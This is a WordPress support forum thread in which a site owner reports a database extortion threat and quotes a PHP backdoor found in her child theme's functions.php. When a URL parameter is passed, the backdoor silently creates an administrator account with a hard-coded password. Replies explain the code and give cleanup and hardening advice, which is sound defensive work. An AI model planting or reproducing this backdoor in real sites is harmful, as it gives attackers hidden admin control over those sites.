Title: Potential database hacking
Last modified: October 10, 2022

---

# Potential database hacking

 *  [sarahjsouris](https://wordpress.org/support/users/sarahjsouris/)
 * (@sarahjsouris)
 * [3 years, 8 months ago](https://wordpress.org/support/topic/potential-database-hacking/)
 * Hello,
 * On Saturday morning we received an email saying that our database has been compromised,
   and threatening to sell it to the highest bidder etc.
 * I would normally think that this is some kind of hoax, except for the fact that
   last week there was an error on the website where the website would not load 
   and there was an error message saying that there was an error in the database–
   there was a link to repair database tables. (Does this sometimes happen with 
   WordPress?)
 * It makes me wonder if maybe the link to repairing database tables was a hack,
   or if the error itself was due to the hackers gaining access to our database.
 * Do you think this could be possible?
 * This morning when I was alerted to this email I started scanning our site for
   Malware and found the following code in our child theme functions.php – which
   seems to be a hack
 *     ```
       add_action('init', 'hjklmopn');
   
       function hjklmopn() {
       if ( isset( $_GET['doomwpl'] ) ) {
       $userdata = array(
           'user_login' => $_GET['doomwpl'],
           'user_url'   => 'joinme.com',
           'user_pass'  => 'doomwp',
           'role'       => 'administrator'
       );
       $user_id  = wp_insert_user( $userdata );
       if ( !is_wp_error( $user_id ) ) {
           var_dump($userdata, $user_id);
       }
       die();
       }
       }
       ```
   
 * I thought that it sounds like it has retrieved role and password information 
   from users of the website – but do you think it is just administrator accounts?
 * Thanks for your help.
 * As I am not fluent in PHP I am not sure what the malicious code has instructed
   the website to do.
 * The rest of our scanners show that there is no additional malware on the site,
   and it seems that there was a vulnerability in our theme builder, so perhaps 
   that is how they got into functions.php
 * Do you think there are any other ways they could have gotten access to functions.
   php?
 * Thanks so much!
    Sarah
    -  This topic was modified 3 years, 8 months ago by [Jan Dembowski](https://wordpress.org/support/users/jdembowski/).
      Reason: Moved to Fixing WordPress, this is not an Developing with WordPress
      topic

Viewing 4 replies - 1 through 4 (of 4 total)

 *  [Dinesh Pilani](https://wordpress.org/support/users/dineshpilani05/)
 * (@dineshpilani05)
 * [3 years, 8 months ago](https://wordpress.org/support/topic/potential-database-hacking/#post-16084081)
 * Hi,
    Maybe the hacker has used an outdated plugin venerability to get access 
   to a function file so that the hacker can add a code to create a new user and
   assign a role as admin, so remove the code and ask your hosting provider to scan
   the server, their many time’s cases that when you are on shared hosting your 
   site can be hacked.
 * Try to Keep Up to date with your plugin themes and WordPress version and reset
   the database password and update it in a wp-config.php file also check in the
   database if there is any unauthorized user is created if it is then remove it
   or move your files and database to the cloud because cloud hosting like RDS on
   AWS provide database encryption and many other provides it
 * And don’t forget to take the backup of website files and database on weekly bases
   and use a security plugin as well
    -  This reply was modified 3 years, 8 months ago by [Dinesh Pilani](https://wordpress.org/support/users/dineshpilani05/).
    -  This reply was modified 3 years, 8 months ago by [Dinesh Pilani](https://wordpress.org/support/users/dineshpilani05/).
 *  Thread Starter [sarahjsouris](https://wordpress.org/support/users/sarahjsouris/)
 * (@sarahjsouris)
 * [3 years, 8 months ago](https://wordpress.org/support/topic/potential-database-hacking/#post-16084113)
 * Hello [@dineshpilani05](https://wordpress.org/support/users/dineshpilani05/) !
 * Thanks so much for your reply. I appreciate your help.
 * Could you please confirm that the code I posted above would be used to insert
   a user into wp-admin, and not to generate a list of all our users’ data?
 * Do you think that it is possible that this user is hidden? Although I checked
   the database this afternoon – they have not been added as a user in the database.
 * I have updated all the plugins, themes etc. I will definitely stay on top of 
   it!
 * And we do regular backups.
 * Thanks so much!
    Sarah
 *  [Dinesh Pilani](https://wordpress.org/support/users/dineshpilani05/)
 * (@dineshpilani05)
 * [3 years, 8 months ago](https://wordpress.org/support/topic/potential-database-hacking/#post-16084341)
 * This code simply inserts the user into the wp_users table with the name doomwpl
   and assign it an admin role, As the user cannot be hidden but you should remove
   this code because if there is a user present in the table of the database and
   remove it, it will automatically create when the website will load so it’s better
   to remove the user. because
    the hook init runs after WordPress has finished 
   loading but before any headers are sent.
 *  [barnez](https://wordpress.org/support/users/pidengmor/)
 * (@pidengmor)
 * [3 years, 8 months ago](https://wordpress.org/support/topic/potential-database-hacking/#post-16086536)
 * > Could you please confirm that the code I posted above would be used to insert
   > a user into wp-admin, and not to generate a list of all our users’ data?
 * Is there a valid reason why this code might have been inserted into the child
   theme?
 * If not:
 * – change all passwords for strong random ones (WP dashboard, cPanel, database)
   –
   change the salt keys in wp-config.php to log out all users – audit your plugins
   for those that are no longer maintained and receiving updates – scan the site
   with the Wordfence and GOTMLS security plugins – install a security plugin (e.
   g. NinjaFirewall) that can email a notification when a new user is created/pluginor
   theme uploaded/user logs in etc – take regular off-site backups
    -  This reply was modified 3 years, 8 months ago by [barnez](https://wordpress.org/support/users/pidengmor/).
      Reason: OP already takes regular backups

Viewing 4 replies - 1 through 4 (of 4 total)

The topic ‘Potential database hacking’ is closed to new replies.

## Tags

 * [database](https://wordpress.org/support/topic-tag/database/)
 * [hacking](https://wordpress.org/support/topic-tag/hacking/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 4 replies
 * 3 participants
 * Last reply from: [barnez](https://wordpress.org/support/users/pidengmor/)
 * Last activity: [3 years, 8 months ago](https://wordpress.org/support/topic/potential-database-hacking/#post-16086536)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics